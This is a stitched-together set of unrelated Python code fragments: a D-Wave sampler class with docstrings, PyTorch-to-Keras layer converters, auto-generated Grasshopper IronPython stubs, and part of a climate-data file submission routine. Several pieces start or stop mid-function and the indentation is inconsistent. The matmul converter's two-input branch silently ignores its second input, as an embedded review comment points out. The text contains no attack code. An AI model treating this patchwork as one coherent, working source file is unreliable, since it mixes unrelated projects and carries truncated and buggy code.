>>> sampler.nodelist # doctest: +SKIP
[0,
1,
2,
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
# Assumption: cloud client nodes are always integer-labelled
try:
nodelist = self._nodelist
except AttributeError:
self._nodelist = nodelist = sorted(self.solver.nodes)
return nodelist
@_failover
def sample_ising(self, h, J, warnings=None, **kwargs):
"""Sample from the specified Ising model.
Args:
h (dict/list):
Linear biases of the Ising model. If a dict, should be of the
form `{v: bias, ...}` where `v` is a spin-valued variable and
`bias` is its associated bias. If a list, it is treated as a
list of biases where the indices are the variable labels,
except in the case of missing qubits in which case 0 biases are
ignored while a non-zero bias set on a missing qubit raises an
error.
J (dict[(int, int): float]):
Quadratic biases of the Ising model.
warnings (:class:`~dwave.system.warnings.WarningAction`, optional):
Defines what warning action to take, if any. See
:mod:`~dwave.system.warnings`. The default behaviour is defined
by :attr:`warnings_default`, which itself defaults to
:class:`~dwave.system.warnings.IGNORE`
**kwargs:
Optional keyword arguments for the sampling method, specified per solver in
:attr:`.DWaveSampler.parameters`. D-Wave System Documentation's
`solver guide <https://docs.dwavesys.com/docs/latest/doc_solver_ref.html>`_
describes the parameters and properties supported on the D-Wave system.
Returns:
:class:`dimod.SampleSet`: A `dimod` :obj:`~dimod.SampleSet` object.
In it this sampler also provides timing information in the `info`
field as described in the D-Wave System Documentation's
`timing guide <https://docs.dwavesys.com/docs/latest/doc_timing.html>`_.
Examples:
This example submits a two-variable Ising problem mapped directly to qubits
0 and 1 on a D-Wave system.
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampleset = sampler.sample_ising({0: -1, 1: 1}, {})
>>> for sample in sampleset.samples(): # doctest: +SKIP
... print(sample)
...
{0: 1, 1: -1}
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
| |
if weights_name in weights:
gamma = weights[weights_name].numpy()
mean = weights[mean_name].numpy()
variance = weights[var_name].numpy()
eps = params['epsilon']
momentum = params['momentum']
if weights_name not in weights:
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
center=False, scale=False,
weights=[mean, variance],
name=tf_name
)
else:
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
weights=[gamma, beta, mean, variance],
name=tf_name
)
layers[scope_name] = bn(layers[inputs[0]])
def convert_elementwise_add(
    params, w_name, scope_name, inputs, layers, weights, short_names
):
    """Map a PyTorch elementwise addition onto a Keras ``Add`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting elementwise_add ...')
    lhs, rhs = layers[inputs[0]], layers[inputs[1]]
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('A' + random_string(7)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Add(name=layer_name)([lhs, rhs])
def convert_elementwise_mul(
    params, w_name, scope_name, inputs, layers, weights, short_names
):
    """Map a PyTorch elementwise multiplication onto a Keras ``Multiply`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting elementwise_mul ...')
    lhs, rhs = layers[inputs[0]], layers[inputs[1]]
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('M' + random_string(7)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Multiply(name=layer_name)([lhs, rhs])
def convert_elementwise_sub(
    params, w_name, scope_name, inputs, layers, weights, short_names
):
    """Map a PyTorch elementwise subtraction onto a Keras ``Subtract`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting elementwise_sub ...')
    lhs, rhs = layers[inputs[0]], layers[inputs[1]]
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('S' + random_string(7)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Subtract(name=layer_name)([lhs, rhs])
def convert_sum(
    params, w_name, scope_name, inputs, layers, weights, short_names
):
    """Map a PyTorch full-tensor sum onto a Keras ``Lambda`` over ``K.sum``.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting Sum ...')

    def sum_all(x):
        # Collapse every axis; matches torch.sum called without a dim.
        return keras.backend.sum(x)

    layers[scope_name] = keras.layers.Lambda(sum_all)(layers[inputs[0]])
def convert_concat(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch concatenation onto a Keras ``Concatenate`` layer.

    Args:
        params: dictionary with layer parameters (uses ``params['axis']``)
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting concat ...')
    tensors_to_join = [layers[node] for node in inputs]
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('CAT' + random_string(5)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Concatenate(
        name=layer_name, axis=params['axis'])(tensors_to_join)
def convert_relu(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch ReLU onto a Keras ``Activation('relu')`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting relu ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('RELU' + random_string(4)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Activation(
        'relu', name=layer_name)(layers[inputs[0]])
def convert_lrelu(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch LeakyReLU onto a Keras ``LeakyReLU`` layer.

    Args:
        params: dictionary with layer parameters (uses ``params['alpha']``)
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting lrelu ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('lRELU' + random_string(3)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.LeakyReLU(
        alpha=params['alpha'], name=layer_name)(layers[inputs[0]])
def convert_sigmoid(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch sigmoid onto a Keras ``Activation('sigmoid')`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting sigmoid ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('SIGM' + random_string(4)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Activation(
        'sigmoid', name=layer_name)(layers[inputs[0]])
def convert_softmax(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch softmax onto a Keras ``Activation('softmax')`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting softmax ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('SMAX' + random_string(4)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Activation(
        'softmax', name=layer_name)(layers[inputs[0]])
def convert_tanh(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch tanh onto a Keras ``Activation('tanh')`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting tanh ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('TANH' + random_string(4)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Activation(
        'tanh', name=layer_name)(layers[inputs[0]])
def convert_selu(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch SELU onto a Keras ``Activation('selu')`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting selu ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('SELU' + random_string(4)) if short_names \
        else (w_name + str(random.random()))
    layers[scope_name] = keras.layers.Activation(
        'selu', name=layer_name)(layers[inputs[0]])
def convert_transpose(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch permute/transpose onto a Keras ``Permute`` layer.

    Keras cannot move the batch axis, so a permutation whose first entry is
    not 0 is passed through unchanged after printing a warning.

    Args:
        params: dictionary with layer parameters (uses ``params['perm']``)
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting transpose ...')
    if params['perm'][0] != 0:
        # Deliberate best-effort: warn instead of raising, and forward the
        # input tensor untouched (the result may be wrong downstream).
        print('!!! Cannot permute batch dimension. Result may be wrong !!!')
        layers[scope_name] = layers[inputs[0]]
    else:
        # Keras layer names must be unique across the whole converted graph.
        layer_name = ('PERM' + random_string(4)) if short_names \
            else (w_name + str(random.random()))
        layers[scope_name] = keras.layers.Permute(
            params['perm'][1:], name=layer_name)(layers[inputs[0]])
def convert_reshape(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch reshape/view onto a Keras ``Reshape`` layer.

    Args:
        params: dictionary with layer parameters (may carry ``params['shape']``)
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting reshape ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('RESH' + random_string(4)) if short_names \
        else (w_name + str(random.random()))
    # A second input carries the target shape; otherwise it comes from params.
    # The leading (batch) dimension is dropped in either case.
    if len(inputs) > 1:
        target_shape = layers[inputs[1]][1:]
    else:
        target_shape = params['shape'][1:]
    layers[scope_name] = keras.layers.Reshape(
        target_shape, name=layer_name)(layers[inputs[0]])
def convert_matmul(params, w_name, scope_name, inputs, layers, weights, short_names):
    """
    Convert matmul layer.
    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting matmul ...')
    # Keras layer names must be unique across the whole converted graph.
    if short_names:
        tf_name = 'MMUL' + random_string(4)
    else:
        tf_name = w_name + str(random.random())
    if len(inputs) == 1:
        # Single input: emit a bias-free Dense layer whose kernel comes from
        # the state_dict entry '<w_name>.weight', transposed from PyTorch's
        # (out, in) layout to Keras' (in, out) layout.
        weights_name = '{0}.weight'.format(w_name)
        W = weights[weights_name].numpy().transpose()
        input_channels, output_channels = W.shape
        keras_weights = [W]
        dense = keras.layers.Dense(
            output_channels,
            weights=keras_weights, use_bias=False, name=tf_name
        )
        layers[scope_name] = dense(layers[inputs[0]])
    elif len(inputs) == 2:
        # NOTE(review): this branch is byte-for-byte identical to the
        # one-input case above and never reads inputs[1]; a true two-operand
        # matmul of layers[inputs[0]] and layers[inputs[1]] is presumably
        # intended -- confirm against the exporter before relying on it.
        weights_name = '{0}.weight'.format(w_name)
        W = weights[weights_name].numpy().transpose()
        input_channels, output_channels = W.shape
        keras_weights = [W]
        dense = keras.layers.Dense(
            output_channels,
            weights=keras_weights, use_bias=False, name=tf_name
        )
        layers[scope_name] = dense(layers[inputs[0]])
    else:
        raise AssertionError('Cannot convert matmul layer')
def convert_gather(params, w_name, scope_name, inputs, layers, weights, short_names):
    """Map a PyTorch gather (embedding lookup) onto a Keras ``Embedding`` layer.

    Args:
        params: dictionary with layer parameters
        w_name: name prefix in state_dict
        scope_name: pytorch scope name
        inputs: pytorch node inputs
        layers: dictionary with keras tensors
        weights: pytorch state_dict
        short_names: use short names for keras layers
    """
    print('Converting embedding ...')
    # Keras layer names must be unique across the whole converted graph.
    layer_name = ('EMBD' + random_string(4)) if short_names \
        else (w_name + str(random.random()))
    # The embedding matrix is the state_dict weight; rows index the
    # vocabulary, columns are the embedding dimensions.
    embedding_matrix = weights['{0}.weight'.format(w_name)].numpy()
    vocab_size, embedding_dim = embedding_matrix.shape
    layers[scope_name] = keras.layers.Embedding(
        vocab_size,
        weights=[embedding_matrix], output_dim=embedding_dim, name=layer_name
    )(layers[inputs[0]])
def convert_reduce_sum(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert reduce_sum layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting reduce_sum ...')
keepdims = params['keepdims'] > 0
axis = np.array(params['axes'])
def target_layer(x, keepdims=keepdims, axis=axis):
return keras.backend.sum(x, keepdims=keepdims, | |
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
    # The members below are part of an auto-generated IronPython stub for the
    # .NET Grasshopper type GH_LinearGraph: bodies are placeholders ("pass")
    # and the docstrings record the CLR signatures. The real implementation
    # lives in the Grasshopper SDK; do not add logic here.
    def Internal_GripChanged(self, *args):
        """ Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
        pass
    def Read(self, reader):
        """ Read(self: GH_LinearGraph,reader: GH_IReader) -> bool """
        pass
    def SetFromParameters(self, nA, nB):
        """ SetFromParameters(self: GH_LinearGraph,nA: float,nB: float) """
        pass
    def UpdateEquation(self, *args):
        """ UpdateEquation(self: GH_LinearGraph) """
        pass
    def ValueAt(self, t):
        """ ValueAt(self: GH_LinearGraph,t: float) -> float """
        pass
    def Write(self, writer):
        """ Write(self: GH_LinearGraph,writer: GH_IWriter) -> bool """
        pass
    def __init__(self, *args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stub properties: getter/setter/deleter are placeholder lambdas; the bare
    # strings that follow document the CLR property signatures.
    GraphTypeID = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: GraphTypeID(self: GH_LinearGraph) -> Guid
    """
    Icon_16x16 = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: Icon_16x16(self: GH_LinearGraph) -> Image
    """
    IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """Get: IsValid(self: GH_LinearGraph) -> bool
    """
    # Placeholder for the nested CLR proxy type; assigned by the runtime.
    GH_LinearGraphProxy = None
# Auto-generated IronPython stub for the .NET Grasshopper type; method bodies
# are placeholders and the docstrings record the CLR signatures.
class GH_ParabolaGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
    """ GH_ParabolaGraph() """
    def AddGrip(self, *args):
        """ AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
        pass
    def ClearGrips(self, *args):
        """ ClearGrips(self: GH_AbstractGraph) """
        pass
    def CreateDerivedDuplicate(self, *args):
        """ CreateDerivedDuplicate(self: GH_ParabolaGraph) -> GH_AbstractGraph """
        pass
    def CreateGrips(self, *args):
        """ CreateGrips(self: GH_ParabolaGraph) """
        pass
    def Draw_PreRenderGraph(self, g, cnt):
        """ Draw_PreRenderGraph(self: GH_ParabolaGraph,g: Graphics,cnt: GH_GraphContainer) -> GH_GraphDrawInstruction """
        pass
    def GHGraphToPointArray(self, *args):
        """
        GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
        GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
        """
        pass
    def Internal_GripChanged(self, *args):
        """ Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
        pass
    def Read(self, reader):
        """ Read(self: GH_ParabolaGraph,reader: GH_IReader) -> bool """
        pass
    def UpdateEquation(self, *args):
        """ UpdateEquation(self: GH_ParabolaGraph) """
        pass
    def ValueAt(self, t):
        """ ValueAt(self: GH_ParabolaGraph,t: float) -> float """
        pass
    def Write(self, writer):
        """ Write(self: GH_ParabolaGraph,writer: GH_IWriter) -> bool """
        pass
    def __init__(self, *args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stub properties: getter/setter/deleter are placeholder lambdas; the bare
    # strings that follow document the CLR property signatures.
    GraphTypeID = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: GraphTypeID(self: GH_ParabolaGraph) -> Guid
    """
    Icon_16x16 = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: Icon_16x16(self: GH_ParabolaGraph) -> Image
    """
    IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """Get: IsValid(self: GH_ParabolaGraph) -> bool
    """
# Auto-generated IronPython stub for the .NET Grasshopper type; method bodies
# are placeholders and the docstrings record the CLR signatures.
class GH_PerlinGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
    """ GH_PerlinGraph() """
    def AddGrip(self, *args):
        """ AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
        pass
    def ClearGrips(self, *args):
        """ ClearGrips(self: GH_AbstractGraph) """
        pass
    def CreateDerivedDuplicate(self, *args):
        """ CreateDerivedDuplicate(self: GH_PerlinGraph) -> GH_AbstractGraph """
        pass
    def CreateGrips(self, *args):
        """ CreateGrips(self: GH_PerlinGraph) """
        pass
    def GHGraphToPointArray(self, *args):
        """
        GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
        GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
        """
        pass
    def Internal_GripChanged(self, *args):
        """ Internal_GripChanged(self: GH_PerlinGraph,grip: GH_GraphGrip,bIntermediate: bool) """
        pass
    def Interpolate(self, *args):
        """ Interpolate(self: GH_PerlinGraph,v0: float,v1: float,v2: float,v3: float,a: float) -> float """
        pass
    def Noise(self, *args):
        """ Noise(self: GH_PerlinGraph,i: int) -> float """
        pass
    def Read(self, reader):
        """ Read(self: GH_PerlinGraph,reader: GH_IReader) -> bool """
        pass
    def Smooth(self, *args):
        """ Smooth(self: GH_PerlinGraph,x: float) -> float """
        pass
    def UpdateEquation(self, *args):
        """ UpdateEquation(self: GH_PerlinGraph) """
        pass
    def ValueAt(self, t):
        """ ValueAt(self: GH_PerlinGraph,t: float) -> float """
        pass
    def Write(self, writer):
        """ Write(self: GH_PerlinGraph,writer: GH_IWriter) -> bool """
        pass
    def __init__(self, *args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stub properties: getter/setter/deleter are placeholder lambdas; the bare
    # strings that follow document the CLR property signatures.
    GraphTypeID = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: GraphTypeID(self: GH_PerlinGraph) -> Guid
    """
    Icon_16x16 = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: Icon_16x16(self: GH_PerlinGraph) -> Image
    """
    IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """Get: IsValid(self: GH_PerlinGraph) -> bool
    """
    # Stub fields; real values are supplied by the CLR runtime.
    amplitude = None
    decay = None
    frequency = None
    x_offset = None
    y_offset = None
# Auto-generated IronPython stub for the .NET Grasshopper type; method bodies
# are placeholders and the docstrings record the CLR signatures.
class GH_PowerGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
    """ GH_PowerGraph() """
    def AddGrip(self, *args):
        """ AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
        pass
    def ClearGrips(self, *args):
        """ ClearGrips(self: GH_AbstractGraph) """
        pass
    def CreateDerivedDuplicate(self, *args):
        """ CreateDerivedDuplicate(self: GH_PowerGraph) -> GH_AbstractGraph """
        pass
    def CreateGrips(self, *args):
        """ CreateGrips(self: GH_PowerGraph) """
        pass
    def GHGraphToPointArray(self, *args):
        """
        GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
        GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
        """
        pass
    def Internal_GripChanged(self, *args):
        """ Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
        pass
    def Read(self, reader):
        """ Read(self: GH_PowerGraph,reader: GH_IReader) -> bool """
        pass
    def UpdateEquation(self, *args):
        """ UpdateEquation(self: GH_PowerGraph) """
        pass
    def ValueAt(self, t):
        """ ValueAt(self: GH_PowerGraph,t: float) -> float """
        pass
    def Write(self, writer):
        """ Write(self: GH_PowerGraph,writer: GH_IWriter) -> bool """
        pass
    def __init__(self, *args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stub properties: getter/setter/deleter are placeholder lambdas; the bare
    # strings that follow document the CLR property signatures.
    GraphTypeID = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: GraphTypeID(self: GH_PowerGraph) -> Guid
    """
    Icon_16x16 = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: Icon_16x16(self: GH_PowerGraph) -> Image
    """
    IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """Get: IsValid(self: GH_PowerGraph) -> bool
    """
# Auto-generated IronPython stub for the .NET Grasshopper type; method bodies
# are placeholders and the docstrings record the CLR signatures.
class GH_SincGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
    """ GH_SincGraph() """
    def AddGrip(self, *args):
        """ AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
        pass
    def ClearGrips(self, *args):
        """ ClearGrips(self: GH_AbstractGraph) """
        pass
    def CreateDerivedDuplicate(self, *args):
        """ CreateDerivedDuplicate(self: GH_SincGraph) -> GH_AbstractGraph """
        pass
    def CreateGrips(self, *args):
        """ CreateGrips(self: GH_SincGraph) """
        pass
    def GDI_GraphPath(self, reg):
        """ GDI_GraphPath(self: GH_SincGraph,reg: RectangleF) -> Array[PointF] """
        pass
    def GHGraphToPointArray(self, *args):
        """
        GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
        GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
        """
        pass
    def Internal_GripChanged(self, *args):
        """ Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
        pass
    def Read(self, reader):
        """ Read(self: GH_SincGraph,reader: GH_IReader) -> bool """
        pass
    def UpdateEquation(self, *args):
        """ UpdateEquation(self: GH_SincGraph) """
        pass
    def ValueAt(self, t):
        """ ValueAt(self: GH_SincGraph,t: float) -> float """
        pass
    def Write(self, writer):
        """ Write(self: GH_SincGraph,writer: GH_IWriter) -> bool """
        pass
    def __init__(self, *args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stub properties: getter/setter/deleter are placeholder lambdas; the bare
    # strings that follow document the CLR property signatures.
    GraphTypeID = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: GraphTypeID(self: GH_SincGraph) -> Guid
    """
    Icon_16x16 = property(
        lambda self: object(), lambda self, v: None, lambda self: None
    )
    """Get: Icon_16x16(self: GH_SincGraph) -> Image
    """
    IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """Get: IsValid(self: GH_SincGraph) -> bool
    """
    # Stub fields; real values are supplied by the CLR runtime.
    amplitude = None
    frequency = None
    X0 = None
    X1 = None
    x_shift = None
    Y0 = None
    Y1 = None
    y_shift = None
# Auto-generated IronPython stub for the .NET Grasshopper type; method bodies
# are placeholders and the docstrings record the CLR signatures.
class GH_SineEquation(object, GH_ISerializable):
    """ GH_SineEquation() """
    def Read(self, reader):
        """ Read(self: GH_SineEquation,reader: GH_IReader) -> bool """
        pass
    def SetEquationFromGrips(self):
        """ SetEquationFromGrips(self: GH_SineEquation) """
        pass
    def ValueAt(self, t):
        """ ValueAt(self: GH_SineEquation,t: float) -> float """
        pass
    def Write(self, writer):
        """ Write(self: GH_SineEquation,writer: GH_IWriter) -> bool """
        pass
    def __init__(self, *args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __repr__(self, *args):
        """ __repr__(self: object) -> str """
        pass
    # Stub fields; real values are supplied by the CLR runtime.
    amplitude = None
    frequency = None
    offset = None
    shift = None
    X0 = None
    X1 = None
    Y0 = None
    Y1 = None
class GH_SineGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
""" GH_SineGraph() """
def AddGrip(self, *args):
""" AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
pass
def ClearGrips(self, *args):
""" ClearGrips(self: GH_AbstractGraph) """
pass
def CreateDerivedDuplicate(self, *args):
""" CreateDerivedDuplicate(self: GH_SineGraph) -> GH_AbstractGraph """
pass
def CreateGrips(self, *args):
""" CreateGrips(self: GH_SineGraph) """
pass
def GDI_GraphPath(self, reg):
""" GDI_GraphPath(self: GH_SineGraph,reg: RectangleF) -> Array[PointF] """
pass
def GHGraphToPointArray(self, *args):
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
def Internal_GripChanged(self, *args):
""" Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
pass
def Read(self, reader):
""" Read(self: GH_SineGraph,reader: GH_IReader) -> bool """
pass
def UpdateEquation(self, *args):
""" UpdateEquation(self: GH_SineGraph) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_SineGraph,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_SineGraph,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
GraphTypeID = property(
lambda self: object(), lambda self, v: None, | |
'v' + date_string
else:
today = datetime.datetime.utcnow()
version_string = today.strftime('v%Y%m%d')
# if the file isn't online (e.g. loaded from JSON) then directory is blank
directory = metadata['directory'] if file_online else None
# create a data file. If the file already exists in the database with
# identical metadata then nothing happens. If the file exists but with
# slightly different metadata then django.db.utils.IntegrityError is
# raised
try:
data_file = DataFile.objects.create(
name=metadata['basename'],
incoming_name=metadata['basename'],
incoming_directory=metadata['directory'],
directory=directory, size=metadata['filesize'],
project=metadata['project'],
institute=metadata['institute'],
climate_model=metadata['climate_model'],
activity_id=metadata['activity_id'],
experiment=metadata['experiment'],
variable_request=metadata['variable'],
data_request=metadata['data_request'],
frequency=metadata['frequency'], rip_code=metadata['rip_code'],
start_time=pdt2num(metadata['start_date'], time_units,
metadata['calendar']) if metadata['start_date']
else None,
end_time=pdt2num(metadata['end_date'], time_units,
metadata['calendar'], start_of_period=False) if
metadata['start_date'] else None,
time_units=time_units, calendar=metadata['calendar'],
version=version_string,
data_submission=data_submission, online=file_online,
grid=metadata.get('grid'),
tape_url = metadata.get('tape_url')
)
except django.db.utils.IntegrityError as exc:
msg = ('Unable to submit file {}: {}'.format(metadata['basename'],
exc.__str__()))
logger.error(msg)
raise SubmissionError(msg)
if metadata['checksum_value']:
checksum = get_or_create(Checksum, data_file=data_file,
checksum_value=metadata['checksum_value'],
checksum_type=metadata['checksum_type'])
def move_rejected_files(submission_dir):
    """
    Move the entire submission to a rejected directory two levels up from the
    submission directory.

    :param str submission_dir: The directory of the failed submission.
    :returns: The path to the submission after the function has run (the
        original path if the move failed).
    """
    rejected_dir = os.path.normpath(os.path.join(submission_dir, '..',
                                                 '..', 'rejected'))
    try:
        # makedirs with exist_ok avoids the check-then-create race of the
        # previous exists()/mkdir() pair when two submissions are rejected
